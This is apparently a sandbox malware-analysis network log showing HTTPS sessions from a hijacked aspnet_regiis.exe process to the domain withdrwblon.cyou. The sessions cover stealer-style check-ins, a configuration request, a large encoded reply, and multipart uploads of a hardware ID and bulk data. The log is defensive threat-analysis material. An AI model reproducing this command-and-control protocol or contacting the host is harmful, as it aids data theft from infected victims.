2024-10-24 19:51:07 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: withdrwblon.cyou
2024-10-24 19:51:07 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-24 19:51:08 UTC	1007	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 19:51:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=l50bgvqv1mk0tnca6e12jq311h; expires=Mon, 17 Feb 2025 13:37:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=msxbNEhYMMOeAGQo20zvtG3djmPD%2BgF7Yaym1MuTqV9Pg1a%2BXyk89ATXnKFH6DsLNJ%2FU1MP5TbACKpBbcCIvuno6XquLUYpN2Kqks3THmBCbarRMwNpATOnfT2PJKP1uyFPy"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7c7ff1ad5a467e-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1970&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1475292&cwnd=251&unsent_bytes=0&cid=6a4cfda64327edee&ts=631&x=0"
2024-10-24 19:51:08 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-10-24 19:51:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49700	188.114.96.3	443	7388	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 19:51:09 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 80 Host: withdrwblon.cyou
2024-10-24 19:51:09 UTC	80	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 40 71 6a 77 6f 31 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--@qjwo1&j=b9abc76ce53b6fc3a03566f8f764f5ea
2024-10-24 19:51:09 UTC	1006	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 19:51:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=n46njjdlad131n1mq5s699lu7o; expires=Mon, 17 Feb 2025 13:37:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wNWxcB7Wf8FexnGahs2GvHSaluWiU43cyqNxi%2BeTDBMYteYvG5Lpde5K1rAlNHjlTn%2F4eTpi2AhieNS%2Bo3PEjdLWqUFxxxCd58k7lNPwWUBUycPQA2LsFll5DuJC9EEoRUSe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7c7ff9fd3bad89-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=20250&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=980&delivery_rate=142920&cwnd=32&unsent_bytes=0&cid=253ee516675c184e&ts=464&x=0"
2024-10-24 19:51:09 UTC	363	IN	Data Raw: 34 32 65 34 0d 0a 44 7a 6a 58 36 4a 6e 4e 48 76 6d 77 2f 4f 52 37 4c 32 53 7a 73 57 62 65 56 4e 56 30 37 30 53 42 77 43 38 54 65 36 33 39 2f 6e 46 30 47 71 48 4b 6f 2f 6b 79 32 38 4f 5a 78 6b 46 4a 42 64 2f 43 41 2f 4a 32 74 42 44 4e 66 75 65 68 51 32 41 65 67 64 2b 49 48 43 30 43 73 59 6e 31 76 6e 76 56 6b 70 6d 63 57 52 55 2f 79 4a 4d 44 73 48 62 76 56 6f 6f 75 34 36 46 44 63 52 72 47 6b 6f 34 64 62 46 43 37 6a 2f 47 6f 66 5a 33 52 6b 49 6b 65 53 67 48 53 32 77 69 33 4f 62 30 5a 7a 57 69 6a 70 56 55 78 51 59 2b 77 6d 77 56 75 64 62 61 62 38 75 39 6a 31 63 76 65 67 52 55 4e 58 70 48 51 41 37 77 34 73 78 43 45 4c 4f 6d 6f 53 33 41 66 78 34 32 58 46 32 64 51 74 59 7a 77 6f 6e 53 4a 33 4a 71 4f 46 55 77 4c 30 70 4e 4b 2f 44 47 76 56 74 56 6d 73 4a 42 4f 59 Data Ascii: 42e4DzjX6JnNHvmw/OR7L2SzsWbeVNV070SBwC8Te639/nF0GqHKo/ky28OZxkFJBd/CA/J2tBDNfuehQ2Aegd+IHC0CsYn1vnvVkpmcWRU/yJMDsHbvVoou46FDcRrGko4dbFC7j/GofZ3RkIkeSgHS2wi3Ob0ZzWijpVUxQY+wmwVudbab8u9j1cvegRUNXpHQA7w4sxCELOmoS3Afx42XF2dQtYzwonSJ3JqOFUwL0pNK/DGvVtVmsJBOY
2024-10-24 19:51:09 UTC	1369	IN	Data Raw: 6b 67 55 32 74 6f 4a 73 54 61 36 48 49 49 6c 34 36 56 48 65 78 62 46 6d 35 45 65 61 31 71 31 79 72 58 76 65 34 4f 53 78 73 59 36 53 42 62 57 33 78 4c 2b 44 50 63 4a 77 7a 2b 6a 70 55 45 78 51 59 2b 58 6d 52 42 75 55 62 71 4a 38 36 52 75 6d 38 43 59 69 78 78 66 41 4e 54 64 44 72 38 6b 76 52 69 4c 4a 65 71 70 52 48 51 65 79 39 2f 53 55 32 70 43 39 64 4b 37 6a 6e 47 51 33 70 53 52 47 51 30 5a 6e 38 70 45 75 7a 72 33 54 73 30 69 34 71 5a 4d 64 52 66 42 6d 35 41 56 59 31 65 36 6a 50 47 76 65 35 48 61 6c 6f 63 55 52 67 6e 52 31 67 6d 34 4d 4c 73 58 69 47 61 74 34 6b 70 70 57 5a 66 66 73 68 52 75 53 50 65 2f 2b 4b 46 79 6e 4d 54 65 6d 56 64 55 52 74 62 66 52 4f 52 32 75 52 4f 43 4e 4f 4b 77 53 48 38 4c 77 35 71 61 48 6d 35 55 74 59 2f 38 6f 6e 4b 64 31 5a 32 4f Data Ascii: kgU2toJsTa6HIIl46VHexbFm5Eea1q1yrXve4OSxsY6SBbW3xL+DPcJwz+jpUExQY+XmRBuUbqJ86Rum8CYixxfANTdDr8kvRiLJeqpRHQey9/SU2pC9dK7jnGQ3pSRGQ0Zn8pEuzr3Ts0i4qZMdRfBm5AVY1e6jPGve5HalocURgnR1gm4MLsXiGat4kppWZffshRuSPe/+KFynMTemVdURtbfROR2uROCNOKwSH8Lw5qaHm5UtY/8onKd1Z2O
2024-10-24 19:51:09 UTC	1369	IN	Data Raw: 62 66 52 4f 52 32 75 78 2b 4e 4c 65 6d 6d 54 58 59 55 79 70 79 62 45 47 42 64 76 34 54 38 71 33 43 53 33 35 69 47 48 6b 6b 44 77 39 59 4e 73 44 72 33 57 4d 30 68 2b 2b 49 56 4d 54 62 49 69 5a 38 38 62 6b 75 38 79 75 54 68 5a 64 76 56 6b 73 5a 42 44 51 48 55 32 77 2b 36 50 72 63 45 69 43 6a 6f 6f 30 64 33 47 4d 4b 54 6d 68 4e 73 57 72 4f 47 2b 36 68 37 69 63 43 62 67 41 74 48 52 70 2b 54 41 36 52 32 37 31 61 37 4e 76 53 7a 57 7a 4d 73 7a 4a 47 53 46 48 73 61 71 73 54 69 37 33 75 58 6b 73 62 47 45 6b 30 4b 31 74 73 43 75 44 36 34 47 59 51 30 34 71 35 44 59 78 37 50 6c 70 49 63 59 56 4f 34 6a 66 61 6b 64 70 62 57 6d 59 64 5a 41 30 62 57 79 30 54 6b 64 6f 45 47 67 43 72 4e 71 55 46 34 57 64 44 52 68 56 4e 71 56 76 58 53 75 36 74 77 6b 39 69 52 6a 78 4e 48 43 Data Ascii: bfROR2ux+NLemmTXYUypybEGBdv4T8q3CS35iGHkkDw9YNsDr3WM0h++IVMTbIiZ88bku8yuThZdvVksZBDQHU2w+6PrcEiCjoo0d3GMKTmhNsWrOG+6h7icCbgAtHRp+TA6R271a7NvSzWzMszJGSFHsaqsTi73uXksbGEk0K1tsCuD64GYQ04q5DYx7PlpIcYVO4jfakdpbWmYdZA0bWy0TkdoEGgCrNqUF4WdDRhVNqVvXSu6twk9iRjxNHC
2024-10-24 19:51:09 UTC	1369	IN	Data Raw: 7a 64 76 6c 57 69 6a 36 6a 2b 67 31 65 50 76 72 64 76 53 6b 74 52 66 75 54 75 36 68 77 32 34 72 65 69 68 70 42 44 74 37 56 44 62 41 38 76 68 32 42 4c 65 65 75 52 48 51 66 7a 70 71 5a 45 6d 6c 57 76 34 7a 34 72 48 4f 55 33 5a 62 47 56 77 30 42 79 5a 4e 63 2f 42 4f 67 48 59 4d 67 6f 37 30 44 61 46 6e 49 6b 39 78 4c 4c 56 61 38 6a 50 32 71 63 4a 72 55 6c 6f 4d 52 53 51 66 58 31 51 65 7a 4d 72 49 58 67 69 4c 76 72 45 64 77 47 4d 4f 55 6b 78 68 6f 47 76 76 4b 2f 4c 63 38 77 35 4b 76 68 51 39 61 46 74 32 54 47 2f 49 76 39 78 47 42 5a 72 76 69 54 47 4d 54 78 5a 47 5a 48 47 68 5a 75 6f 33 32 71 58 43 52 32 35 61 41 46 6b 51 55 30 74 38 4b 75 7a 69 37 47 49 41 73 34 4b 38 4e 50 31 6e 49 68 39 78 4c 4c 58 61 79 68 39 57 6b 63 4a 79 53 67 63 67 41 44 51 48 64 6b 31 Data Ascii: zdvlWij6j+g1ePvrdvSktRfuTu6hw24reihpBDt7VDbA8vh2BLeeuRHQfzpqZEmlWv4z4rHOU3ZbGVw0ByZNc/BOgHYMgo70DaFnIk9xLLVa8jP2qcJrUloMRSQfX1QezMrIXgiLvrEdwGMOUkxhoGvvK/Lc8w5KvhQ9aFt2TG/Iv9xGBZrviTGMTxZGZHGhZuo32qXCR25aAFkQU0t8Kuzi7GIAs4K8NP1nIh9xLLXayh9WkcJySgcgADQHdk1
2024-10-24 19:51:09 UTC	1369	IN	Data Raw: 49 49 6f 32 38 36 45 50 51 41 2f 4d 69 5a 63 65 59 52 71 71 78 4f 4c 76 65 35 65 53 78 73 59 66 51 67 2f 53 33 41 57 31 4f 72 6f 54 68 43 50 69 70 45 6c 37 45 38 2b 5a 6d 68 4a 6f 55 4c 61 4c 38 61 5a 37 6b 39 57 64 6c 46 6b 44 52 74 62 4c 52 4f 52 32 6e 68 47 66 4b 50 50 69 55 6a 38 41 6a 35 69 51 55 7a 55 61 73 59 44 30 71 33 75 58 31 4a 75 41 46 45 77 4a 30 4e 4d 4c 75 44 32 2b 45 49 77 72 35 71 39 4a 59 78 50 45 6b 4a 41 61 59 56 66 31 78 4c 75 6f 5a 4e 75 4b 33 72 63 55 51 77 6a 57 78 55 53 6a 65 4b 35 57 69 69 71 6a 2b 67 31 77 46 63 43 63 6b 78 42 75 57 37 2b 59 36 61 4e 31 6b 39 65 53 6a 52 64 4c 46 4e 66 63 44 62 38 31 76 68 47 46 4b 75 6d 68 53 6a 46 58 6a 35 69 45 55 7a 55 61 6c 70 33 72 6f 6a 79 45 6e 49 66 47 48 6b 46 47 69 5a 4d 4d 73 54 36 Data Ascii: IIo286EPQA/MiZceYRqqxOLve5eSxsYfQg/S3AW1OroThCPipEl7E8+ZmhJoULaL8aZ7k9WdlFkDRtbLROR2nhGfKPPiUj8Aj5iQUzUasYD0q3uX1JuAFEwJ0NMLuD2+EIwr5q9JYxPEkJAaYVf1xLuoZNuK3rcUQwjWxUSjeK5Wiiqj+g1wFcCckxBuW7+Y6aN1k9eSjRdLFNfcDb81vhGFKumhSjFXj5iEUzUalp3rojyEnIfGHkFGiZMMsT6
2024-10-24 19:51:09 UTC	1369	IN	Data Raw: 2b 71 6d 52 58 49 5a 79 35 75 62 46 6d 35 57 76 6f 33 34 6f 48 69 53 33 4a 65 4a 57 51 4e 47 31 73 74 45 35 48 61 57 44 59 34 71 37 75 4a 53 50 77 43 50 6d 4a 42 54 4e 52 71 35 68 50 36 76 64 70 33 57 6d 34 41 54 53 41 62 61 30 41 75 34 4d 4c 4d 5a 6a 53 33 71 6f 30 74 30 45 38 53 5a 6b 52 42 72 58 50 58 45 75 36 68 6b 32 34 72 65 70 67 4a 41 43 74 61 54 47 2f 49 76 39 78 47 42 5a 72 76 69 52 6e 30 64 79 4a 2b 52 45 47 56 66 73 59 44 2b 72 33 53 4a 32 70 36 42 43 31 38 47 32 4e 59 49 76 7a 61 7a 45 49 51 67 34 4b 59 4e 50 31 6e 49 68 39 78 4c 4c 58 65 35 6a 64 4b 6f 5a 39 76 4e 30 4a 39 5a 53 67 71 52 69 30 53 39 50 62 30 5a 67 43 58 6c 6f 55 5a 30 45 38 36 59 6c 42 35 2f 57 62 71 46 2f 36 39 7a 6e 64 53 66 69 52 39 4b 44 39 44 62 41 2f 78 34 39 78 47 56 Data Ascii: +qmRXIZy5ubFm5Wvo34oHiS3JeJWQNG1stE5HaWDY4q7uJSPwCPmJBTNRq5hP6vdp3Wm4ATSAba0Au4MLMZjS3qo0t0E8SZkRBrXPXEu6hk24repgJACtaTG/Iv9xGBZrviRn0dyJ+REGVfsYD+r3SJ2p6BC18G2NYIvzazEIQg4KYNP1nIh9xLLXe5jdKoZ9vN0J9ZSgqRi0S9Pb0ZgCXloUZ0E86YlB5/WbqF/69zndSfiR9KD9DbA/x49xGV
2024-10-24 19:51:09 UTC	1369	IN	Data Raw: 64 38 48 39 69 4f 30 41 5a 75 56 4c 75 4e 37 65 38 79 32 39 33 65 33 69 41 4e 54 70 48 73 53 76 77 75 39 30 37 4e 45 2b 43 73 51 33 59 50 33 74 4b 37 43 57 42 63 6f 70 75 37 34 54 79 64 6b 73 62 57 56 77 30 43 77 4a 4e 63 37 47 54 73 51 39 35 78 73 2f 42 53 50 77 43 50 69 64 78 4c 50 78 54 31 6d 4c 76 33 50 4e 7a 52 6a 4a 51 66 54 68 44 53 6c 44 71 43 47 4c 41 51 69 43 48 7a 34 47 4e 36 44 63 6a 66 30 6c 4e 69 47 75 32 7a 75 2b 63 38 70 4a 7a 65 6e 6c 6b 56 52 75 54 51 43 72 49 78 6f 51 66 41 43 4f 53 6b 53 48 59 4a 6a 62 47 58 42 32 6f 61 2b 38 72 39 37 79 54 4c 6e 4e 36 43 43 41 31 65 67 59 46 66 36 57 58 67 52 74 38 35 72 62 73 4e 5a 31 6d 58 7a 64 4a 54 66 78 72 74 79 72 79 73 62 6f 6e 55 6e 5a 41 61 43 6a 6a 76 30 42 4b 78 4f 62 77 58 73 78 6a 4e 72 Data Ascii: d8H9iO0AZuVLuN7e8y293e3iANTpHsSvwu907NE+CsQ3YP3tK7CWBcopu74TydksbWVw0CwJNc7GTsQ95xs/BSPwCPidxLPxT1mLv3PNzRjJQfThDSlDqCGLAQiCHz4GN6Dcjf0lNiGu2zu+c8pJzenlkVRuTQCrIxoQfACOSkSHYJjbGXB2oa+8r97yTLnN6CCA1egYFf6WXgRt85rbsNZ1mXzdJTfxrtyrysbonUnZAaCjjv0BKxObwXsxjNr
2024-10-24 19:51:09 UTC	1369	IN	Data Raw: 42 6d 49 6f 43 49 48 32 37 6a 66 71 35 62 49 7a 64 30 61 67 76 62 45 61 66 6b 77 4c 38 62 75 56 59 7a 53 4c 79 34 68 55 68 53 35 54 4b 7a 30 51 39 43 4b 72 45 34 75 39 71 32 34 72 4d 79 46 6c 66 52 6f 6d 54 51 37 38 6b 70 52 43 4f 4d 4f 44 6c 63 30 38 2b 77 5a 69 64 42 58 31 58 75 61 76 34 76 6e 61 6c 37 49 75 46 46 30 4d 42 78 38 4a 45 38 6e 61 34 56 74 55 66 6f 2b 6f 4e 54 6c 65 50 68 39 78 4c 4c 57 2b 32 68 50 57 6f 61 6f 71 66 75 59 67 65 54 42 44 42 33 67 69 64 4e 61 59 63 7a 57 69 6a 70 41 30 70 53 34 48 66 6d 41 49 74 41 75 58 59 6f 50 6f 76 7a 49 4c 4d 6d 56 64 55 52 73 65 54 58 4f 35 34 39 77 54 4e 66 71 50 6c 54 6d 4d 4c 79 5a 79 4b 45 43 70 6b 69 36 2f 73 72 47 79 64 30 61 43 34 4d 6b 45 41 31 73 6b 44 75 68 43 58 56 73 4e 6d 37 4f 49 56 53 46 Data Ascii: BmIoCIH27jfq5bIzd0agvbEafkwL8buVYzSLy4hUhS5TKz0Q9CKrE4u9q24rMyFlfRomTQ78kpRCOMODlc08+wZidBX1Xuav4vnal7IuFF0MBx8JE8na4VtUfo+oNTlePh9xLLW+2hPWoaoqfuYgeTBDB3gidNaYczWijpA0pS4HfmAItAuXYoPovzILMmVdURseTXO549wTNfqPlTmMLyZyKECpki6/srGyd0aC4MkEA1skDuhCXVsNm7OIVSF
2024-10-24 19:51:09 UTC	1369	IN	Data Raw: 55 33 55 61 37 63 72 57 76 58 75 4c 30 64 79 6a 49 77 38 33 78 39 41 45 73 6a 48 33 43 63 4d 2f 6f 37 51 4e 4b 55 71 42 33 34 35 54 4e 52 72 79 68 50 61 75 66 35 58 52 6a 4a 51 66 54 68 44 53 6c 44 71 43 47 62 77 58 6e 53 76 79 72 30 6c 6e 4a 2f 47 34 6d 68 5a 71 5a 49 75 39 36 71 68 73 32 66 53 64 6b 42 6f 4e 53 4a 48 4c 52 4f 52 32 6b 42 43 49 49 61 50 73 44 58 56 5a 6c 39 2b 7a 47 47 78 4b 75 4a 76 32 71 32 72 5a 39 5a 69 44 48 67 31 49 6b 64 39 45 35 48 61 34 42 34 6f 67 35 71 55 42 64 67 50 49 33 39 4a 54 59 78 72 74 79 76 53 2b 65 35 33 58 6d 63 6f 66 51 77 69 52 7a 45 71 6c 64 71 46 57 31 58 57 74 34 6c 38 78 51 59 2f 59 6b 68 35 73 57 62 75 4a 36 62 31 36 6d 4d 53 64 77 53 64 7a 4a 73 48 51 45 4c 73 48 75 68 4b 62 4d 2b 43 79 53 6b 38 6e 37 34 2b Data Ascii: U3Ua7crWvXuL0dyjIw83x9AEsjH3CcM/o7QNKUqB345TNRryhPauf5XRjJQfThDSlDqCGbwXnSvyr0lnJ/G4mhZqZIu96qhs2fSdkBoNSJHLROR2kBCIIaPsDXVZl9+zGGxKuJv2q2rZ9ZiDHg1Ikd9E5Ha4B4og5qUBdgPI39JTYxrtyvS+e53XmcofQwiRzEqldqFW1XWt4l8xQY/Ykh5sWbuJ6b16mMSdwSdzJsHQELsHuhKbM+CySk8n74+

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49701	188.114.96.3	443	7388	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 19:51:10 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12845 Host: withdrwblon.cyou
2024-10-24 19:51:10 UTC	12845	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 43 33 42 35 46 43 34 46 46 34 31 39 31 38 44 30 41 45 35 33 44 31 34 44 43 41 45 45 30 37 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 71 6a 77 6f Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"4C3B5FC4FF41918D0AE53D14DCAEE077--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--@qjwo
2024-10-24 19:51:11 UTC	1022	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 19:51:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=gst9lrtkj3el6mheetgm8suk5i; expires=Mon, 17 Feb 2025 13:37:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CBf2PZ3v8lbg5TwMhhEnXS1Ltc%2BFlS%2BJbveBctSrzH0a6%2FMlza%2BHjrr0kshfEwHErLvWcaMm%2B8t0GeAD%2FKwVeS3%2Br4KwvDMZ0uixYh2Af%2Bd8iG%2BFQxbz7G1vBjVjEvjy4FK2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7c80043fff346e-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1324&sent=7&recv=16&lost=0&retrans=0&sent_bytes=2838&recv_bytes=13785&delivery_rate=2203957&cwnd=251&unsent_bytes=0&cid=80755e9d5bce2f7a&ts=626&x=0"
2024-10-24 19:51:11 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 0d 0a Data Ascii: 11ok 173.254.250.71
2024-10-24 19:51:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49702	188.114.96.3	443	7388	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 19:51:12 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15077 Host: withdrwblon.cyou
2024-10-24 19:51:12 UTC	15077	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 43 33 42 35 46 43 34 46 46 34 31 39 31 38 44 30 41 45 35 33 44 31 34 44 43 41 45 45 30 37 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 71 6a 77 6f Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"4C3B5FC4FF41918D0AE53D14DCAEE077--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--@qjwo
2024-10-24 19:51:13 UTC	1019	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 19:51:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=t2o6oajbsa5ufosp2k291cai3j; expires=Mon, 17 Feb 2025 13:37:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E58H7y2mm4sEflq27VFSP6RXaXDnjQErWAma8Tq7HEvYunhZkrx%2BBc9Q8x9T1pgteTkc%2FKNSX%2B4Anc1LoVrrz%2BSGPGo1oWLhyktBl%2FwGJaio7%2Bwq1WtH8Fxpta%2FQobDCexvA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7c800fabf12cb0-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1396&sent=10&recv=22&lost=0&retrans=0&sent_bytes=2839&recv_bytes=16017&delivery_rate=2028011&cwnd=251&unsent_bytes=0&cid=3eb3ecafe1550b54&ts=683&x=0"
2024-10-24 19:51:13 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 0d 0a Data Ascii: 11ok 173.254.250.71
2024-10-24 19:51:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49709	188.114.96.3	443	7388	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 19:51:14 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20402 Host: withdrwblon.cyou
2024-10-24 19:51:14 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 43 33 42 35 46 43 34 46 46 34 31 39 31 38 44 30 41 45 35 33 44 31 34 44 43 41 45 45 30 37 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 71 6a 77 6f Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"4C3B5FC4FF41918D0AE53D14DCAEE077--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--@qjwo
